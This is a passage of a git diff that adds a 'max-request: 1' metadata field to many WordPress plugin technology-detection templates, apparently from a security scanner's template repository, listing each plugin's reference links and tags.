b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml index c9859e9770..96c813ad49 100644 --- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml +++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-google-fonts/ metadata: + max-request: 1 plugin_namespace: easy-google-fonts wpscan: https://wpscan.com/plugin/easy-google-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ 